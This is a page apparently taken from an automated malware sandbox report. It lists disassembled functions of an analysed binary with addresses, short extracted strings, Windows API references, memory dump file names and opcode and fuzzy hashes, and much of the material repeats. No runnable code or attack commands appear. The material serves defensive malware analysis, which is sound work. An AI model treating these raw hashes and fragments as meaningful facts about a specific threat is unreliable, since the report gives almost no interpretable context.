Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID:
String ID: 42BCA40E06D6DEFC23D904AF30EFEBBC$EIFT$_P$w
API String ID: 0-2525036307
Opcode ID: 1eb74ef287c21f5ccee2cc6bc1cada64885e50bf6a659cee1d6563d5c6bee3ff
Instruction ID: b7405c75680637a1ce14a198bc9438c0d0ecf4accddd2816c86ddfb705afee7e
Opcode Fuzzy Hash: 1eb74ef287c21f5ccee2cc6bc1cada64885e50bf6a659cee1d6563d5c6bee3ff
Instruction Fuzzy Hash: 37C149716087409BD318CF35C852BAFBBE6EBD1314F18992DE4D297391DA39C90ACB16

Function 00EE6170 Relevance: 5.3, Strings: 4, Instructions: 318
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

cba`, xrefs: 00EE61C1
8zVc, xrefs: 00EE627D
4zVc, xrefs: 00EE621C
YNMZ, xrefs: 00EE6446

Memory Dump Source

Source File: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID: InitializeThunk
String ID: 4zVc$8zVc$YNMZ$cba`
API String ID: 2994545307-1799417857
Opcode ID: 6d0b7ae14696e58ed42af1ecf3ed3533f48df62a4c9858bf6de6db342d8e206b
Instruction ID: 5c29880a321e1af62f889cecd3b732966f042395e8f65bcf0dacaf2f6fb0f476
Opcode Fuzzy Hash: 6d0b7ae14696e58ed42af1ecf3ed3533f48df62a4c9858bf6de6db342d8e206b
Instruction Fuzzy Hash: AC917AB2E043584BD724DE26DC81B2B72A2EBE0358F19943CE995AB292F7759C00C7D1

Function 00EC87F0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 146
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(00000000), ref: 00EC897C

Strings

YO9W, xrefs: 00EC8822

Memory Dump Source

Source File: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID: ExitProcess
String ID: YO9W
API String ID: 621844428-386669604
Opcode ID: b29e37db20a9de892ccae27e7280672b673f937e2e781a8484d29bc40335dac3
Instruction ID: 5dd6fb061e39b3835b4de597d963218798f79e242653447a35d7fb05f78f55cc
Opcode Fuzzy Hash: b29e37db20a9de892ccae27e7280672b673f937e2e781a8484d29bc40335dac3
Instruction Fuzzy Hash: 88315433F5022803C31C69B98E4676AB1874BC4618F0FA63C5DD9BB386FDB98C0542D2

Function 00ED6B7E Relevance: 1.8, APIs: 1, Instructions: 335COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d9547a01c779a5066e7e91ec0c2c81cd4b870d1bad968b5d0a4eb199f2f84bc
Instruction ID: b887b8eb3511c9b64ced652e4271ff992c94d5704227a46aa78775631cd53e43
Opcode Fuzzy Hash: 1d9547a01c779a5066e7e91ec0c2c81cd4b870d1bad968b5d0a4eb199f2f84bc
Instruction Fuzzy Hash: 43A156B16047418FCB20CF34C891A63BBE2FF55314B189A6ED48A8B392E735E906CB51

Function 00EFE690 Relevance: 1.6, Strings: 1, Instructions: 384COMMON

Download Yara Rule

Strings

@CDE, xrefs: 00EFE8D1

Memory Dump Source

Source File: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID: InitializeThunk
String ID: @CDE
API String ID: 2994545307-1513065382
Opcode ID: 70e2b7183e76f92241001cf5fc05c7f96be0e42f0a8cab359fa909367e5263ad
Instruction ID: 996603aa64df778e03c2cf67e18d3db010cd999c55f69f89d588e7921f400808
Opcode Fuzzy Hash: 70e2b7183e76f92241001cf5fc05c7f96be0e42f0a8cab359fa909367e5263ad
Instruction Fuzzy Hash: 58B155717483484BC318DB29C8D093BBBE6ABD5308F1CD96CE696973A2D674EC058792

Function 00EFB480 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(00EFD4FB,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 00EFB4AE

Memory Dump Source

Source File: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 00ED7E82 Relevance: 1.5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

tuv, xrefs: 00ED8856

Memory Dump Source

Source File: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID:
String ID: tuv
API String ID: 0-2475268160
Opcode ID: 96d2753ff0ef8bde22e9f8906ebdf319066d10b461a4389b3e2b11c8a78169e0
Instruction ID: 392b2eec8c1454851364df8f6f7d7199ed3bf36feb495247126240e752f4231b
Opcode Fuzzy Hash: 96d2753ff0ef8bde22e9f8906ebdf319066d10b461a4389b3e2b11c8a78169e0
Instruction Fuzzy Hash: A36144B2604300CFD7208F24C992767B3E2FF56358F18656EE9D6973A1E776A806D710

Function 00EFDBD0 Relevance: 1.3, Strings: 1, Instructions: 97COMMON

Download Yara Rule

Strings

@, xrefs: 00EFDC39

Memory Dump Source

Source File: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: e9156f8ca8875318916c403528559aae6f78c798ed27e8658f2aa2b2e64ac758
Instruction ID: 2b334c99321a298688ed554a16d3b07eece8acb82e3b9adac657030e0c6b62ad
Opcode Fuzzy Hash: e9156f8ca8875318916c403528559aae6f78c798ed27e8658f2aa2b2e64ac758
Instruction Fuzzy Hash: 6D312FB110C3088BC314DF18C8D1A7BFBF9FB95314F14A92CE68697291D3719908CB96

Function 00EC9CC0 Relevance: 1.3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

Strings

\U^_, xrefs: 00EC9CE5

Memory Dump Source

Source File: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID:
String ID: \U^_
API String ID: 0-352632802
Opcode ID: d1eea7d42bf37c636350dd23afe671d3accf93d1517182893d06141ba46fdc5f
Instruction ID: 54f7bdf50a2adf715f060b9b933073ca5370af2183695a65d437daab1904ef07
Opcode Fuzzy Hash: d1eea7d42bf37c636350dd23afe671d3accf93d1517182893d06141ba46fdc5f
Instruction Fuzzy Hash: 8511E27160C3808FC3249F349954AABBBE5EBD7748F545A2CE0C96B241C735980A8FA6

Function 00ED0FD6 Relevance: .9, Instructions: 882COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba39f0f9d87b382341be3f4f8020869ab4e9ab20a3df9238c059caac2ca6b575
Instruction ID: 75a5fe34528bd0ff29e76551fe4f04a8b2515927810413703860869bc2776152
Opcode Fuzzy Hash: ba39f0f9d87b382341be3f4f8020869ab4e9ab20a3df9238c059caac2ca6b575
Instruction Fuzzy Hash: ED72E5B5A04B408FD714DF38C58579ABBE1EB56310F098A7ED4EB87792E635E406CB02

Function 00EFDCF0 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a11d31408c24c027355b29346fc6feb65f547f7629d0009547015d26d4ff3d55
Instruction ID: c9eb448e4398d0e1dce041e6446fe9e6eec9993b46a45310b43991ccf9f7ef7c
Opcode Fuzzy Hash: a11d31408c24c027355b29346fc6feb65f547f7629d0009547015d26d4ff3d55
Instruction Fuzzy Hash: D0716832B083095BC714AF28CC50A7FBBA7EFD5750F19D52CE6869B261EB319C109782

Function 00EF9B90 Relevance: .2, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cf1b98280b6397befb3252202d01d3f8de72c7ca81954f9add425b6fd14028a2
Instruction ID: 1e2819d81e711a50be0427e27627020ae79fdaa3150a42994bb433cd7d7410ea
Opcode Fuzzy Hash: cf1b98280b6397befb3252202d01d3f8de72c7ca81954f9add425b6fd14028a2
Instruction Fuzzy Hash: 07614D726082085FD718DF28D950B7BB7D2EBD0308F29946DD6C6A7357EA329D01CB85

Function 00EFB420 Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,?,00ECB29B,?,00000001,?,?,?,?,?,?,?), ref: 00EFB452

Memory Dump Source

Source File: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 101234df0ea5c0c3f2a52bd7a072cac8ef7a4ed9bcad80aa9bfcee3d6a27d993
Instruction ID: 03693500d7d555cd633593bc0172bbfea5beecccb396ab132b09b7fc028b9731
Opcode Fuzzy Hash: 101234df0ea5c0c3f2a52bd7a072cac8ef7a4ed9bcad80aa9bfcee3d6a27d993
Instruction Fuzzy Hash: 18E02B3250421CEBC2102F38BD05B7736B8AF86710F164434F541F2116E731E810D5D5

Function 00EF0879 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 00EF08C3

Memory Dump Source

Source File: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: bc868133ad595b042ad53962191033b9267711620888c436eb518391a82545d5
Instruction ID: 3ac68123e1e776151261052f8a758a2a865d95348d8f3d24beb8ef722b5ca6b3
Opcode Fuzzy Hash: bc868133ad595b042ad53962191033b9267711620888c436eb518391a82545d5
Instruction Fuzzy Hash: 2B01B2B5249702CBE310CF64D5D8B4BBBF1BB84304F14891CE8954B395DBB5A9498FC2

Function 00EEE343 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 00EEE38C

Memory Dump Source

Source File: 00000000.00000002.2279707731.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2279692253.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279707731.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279754829.0000000000F13000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000109C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.0000000001175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.000000000119D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2279773113.00000000011B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280006068.00000000011B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280107848.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2280124787.000000000134C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_file.jbxd

Similarity

API ID: BlanketProxy
